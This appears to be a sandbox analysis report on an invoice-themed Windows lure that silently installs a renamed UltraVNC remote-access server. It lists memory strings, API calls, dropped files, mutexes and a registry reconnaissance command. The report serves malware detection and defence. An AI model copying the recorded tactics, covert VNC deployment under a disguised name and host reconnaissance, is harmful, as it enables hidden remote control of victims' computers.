Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.dr	String found in binary or memory: http://www.pdf-tools.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: taskhost.exe.0.dr	String found in binary or memory: https://forum.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://forum.uvnc.comvncMenu::WndProc
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://www.thawte.com/repository0W
Source: taskhost.exe.0.dr	String found in binary or memory: https://www.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://www.uvnc.comcmd
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://www.uvnc.comhttps://forum.uvnc.comnet

Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Games\taskhost.exe

Code function: 42_2_005F54D0 SystemParametersInfoA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,

42_2_005F54D0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B6AD30 NtdllDefWindowProc_W,	0_2_00B6AD30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00AD73D0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W,	0_2_00AD73D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A605B0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,	0_2_00A605B0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_009F8520 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString,	0_2_009F8520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A0EA60 NtdllDefWindowProc_W,	0_2_00A0EA60
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_009F8BD0 NtdllDefWindowProc_W,	0_2_009F8BD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A02CE0 NtdllDefWindowProc_W,	0_2_00A02CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_009FADD0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,	0_2_009FADD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A1CDD0 NtdllDefWindowProc_W,	0_2_00A1CDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A02E50 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,	0_2_00A02E50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A09070 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,	0_2_00A09070
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_009FB5C0 NtdllDefWindowProc_W,	0_2_009FB5C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00AB55C0 NtdllDefWindowProc_W,	0_2_00AB55C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_009FBC20 NtdllDefWindowProc_W,	0_2_009FBC20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_009F7D50 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,	0_2_009F7D50

Source: C:\Games\taskhost.exe

Code function: 42_2_005AB8D0 wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProces

42_2_005AB8D0

Source: C:\Games\taskhost.exe

Code function: wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProces

42_2_005AB8D0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_054FF706	0_3_054FF706
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_054FB671	0_3_054FB671
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B62440	0_2_00B62440
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B46F90	0_2_00B46F90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B49080	0_2_00B49080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A0F6F0	0_2_00A0F6F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B25910	0_2_00B25910
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B37CE0	0_2_00B37CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B33C50	0_2_00B33C50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B80210	0_2_00B80210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B7C3F0	0_2_00B7C3F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A1E4E0	0_2_00A1E4E0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00C0C5E2	0_2_00C0C5E2
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A16600	0_2_00A16600
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BFA7D0	0_2_00BFA7D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A12743	0_2_00A12743
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B78800	0_2_00B78800
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00C029F3	0_2_00C029F3
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BCCA10	0_2_00BCCA10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B8CA50	0_2_00B8CA50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A22BA0	0_2_00A22BA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BF2DEE	0_2_00BF2DEE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B6CED0	0_2_00B6CED0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A14E40	0_2_00A14E40
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B80FB0	0_2_00B80FB0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BD8F00	0_2_00BD8F00
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A0B090	0_2_00A0B090
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A0F180	0_2_00A0F180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BF317C	0_2_00BF317C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A03390	0_2_00A03390
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_009E1490	0_2_009E1490
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_009E3480	0_2_009E3480
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B89470	0_2_00B89470
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00C05560	0_2_00C05560
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BD3650	0_2_00BD3650
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A1F740	0_2_00A1F740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B23750	0_2_00B23750
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A63B10	0_2_00A63B10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00AF9B50	0_2_00AF9B50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BD5C90	0_2_00BD5C90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_009E7AA0	0_2_009E7AA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00B7FD90	0_2_00B7FD90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A0FF50	0_2_00A0FF50
Source: C:\Games\viewer.exe	Code function: 7_2_009667A0	7_2_009667A0
Source: C:\Games\viewer.exe	Code function: 7_2_0098E0E0	7_2_0098E0E0
Source: C:\Games\viewer.exe	Code function: 7_2_00990040	7_2_00990040
Source: C:\Games\viewer.exe	Code function: 7_2_0098B1CB	7_2_0098B1CB
Source: C:\Games\viewer.exe	Code function: 7_2_00999151	7_2_00999151
Source: C:\Games\viewer.exe	Code function: 7_2_0098B3FD	7_2_0098B3FD
Source: C:\Games\viewer.exe	Code function: 7_2_0096C340	7_2_0096C340
Source: C:\Games\viewer.exe	Code function: 7_2_0099E498	7_2_0099E498
Source: C:\Games\viewer.exe	Code function: 7_2_009867B0	7_2_009867B0
Source: C:\Games\viewer.exe	Code function: 7_2_009918B4	7_2_009918B4
Source: C:\Games\viewer.exe	Code function: 7_2_009A1804	7_2_009A1804
Source: C:\Games\viewer.exe	Code function: 7_2_009A1924	7_2_009A1924
Source: C:\Games\viewer.exe	Code function: 7_2_0099FDE4	7_2_0099FDE4
Source: C:\Games\viewer.exe	Code function: 7_2_0096DD00	7_2_0096DD00
Source: C:\Games\viewer.exe	Code function: 7_2_009A4EF0	7_2_009A4EF0
Source: C:\Games\viewer.exe	Code function: 7_2_00999F09	7_2_00999F09
Source: C:\Games\viewer.exe	Code function: 7_2_0096FF00	7_2_0096FF00
Source: C:\Games\taskhost.exe	Code function: 42_2_00642820	42_2_00642820
Source: C:\Games\taskhost.exe	Code function: 42_2_0063F0D0	42_2_0063F0D0
Source: C:\Games\taskhost.exe	Code function: 42_2_006BA974	42_2_006BA974
Source: C:\Games\taskhost.exe	Code function: 42_2_0059D9F0	42_2_0059D9F0
Source: C:\Games\taskhost.exe	Code function: 42_2_0063FA50	42_2_0063FA50
Source: C:\Games\taskhost.exe	Code function: 42_2_006C5A2B	42_2_006C5A2B
Source: C:\Games\taskhost.exe	Code function: 42_2_006A4362	42_2_006A4362
Source: C:\Games\taskhost.exe	Code function: 42_2_006C23F9	42_2_006C23F9
Source: C:\Games\taskhost.exe	Code function: 42_2_006AA650	42_2_006AA650
Source: C:\Games\taskhost.exe	Code function: 42_2_0059D700	42_2_0059D700
Source: C:\Games\taskhost.exe	Code function: 42_2_006A3FD4	42_2_006A3FD4

Source: C:\Games\viewer.exe	Code function: String function: 00985630 appears 40 times
Source: C:\Games\viewer.exe	Code function: String function: 00985126 appears 60 times
Source: C:\Games\viewer.exe	Code function: String function: 009850F2 appears 93 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 00A05220 appears 35 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 009EAEE0 appears 68 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 009E9320 appears 120 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 009E87F0 appears 52 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 009EA880 appears 59 times
Source: C:\Games\taskhost.exe	Code function: String function: 0059CCB0 appears 34 times

Source: Preventivo24.01.11.exe

Static PE information: invalid certificate

Source: taskhost.exe.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskhost.exe.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate

Source: Preventivo24.01.11.exe, 00000000.00000003.2018147463.0000000005565000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelzmaextractor.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePrereq.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVNCHooks.dllH vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2029764855.0000000005577000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewininet.dllD vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B331000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinVNC.exe0 vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000000.1976018544.0000000000D6B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe	Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Section loaded: lpk.dll	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior

Source: Preventivo24.01.11.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description

Source: shi5398.tmp.0.dr

Binary string: \Device\NameResTrk\RecordNrtCloneOpenPacket

Source: classification engine

Classification label: mal84.rans.troj.evad.winEXE@109/76@4/4

Source: ~.pdf.0.dr

Initial sample: http://www.pdf-tools.com\

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00B20AF0 FormatMessageW,GetLastError,

0_2_00B20AF0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00B54BE0 GetDiskFreeSpaceExW,

0_2_00B54BE0

Source: C:\Games\viewer.exe

Code function: 7_2_00963710 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

7_2_00963710

Source: C:\Games\viewer.exe

Code function: 7_2_009649C0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,

7_2_009649C0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_009EA740 LoadResource,LockResource,SizeofResource,

0_2_009EA740

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Games\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File created: C:\Users\user\AppData\Local\Temp\upd4A5F.tmp

Jump to behavior

Source: Preventivo24.01.11.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

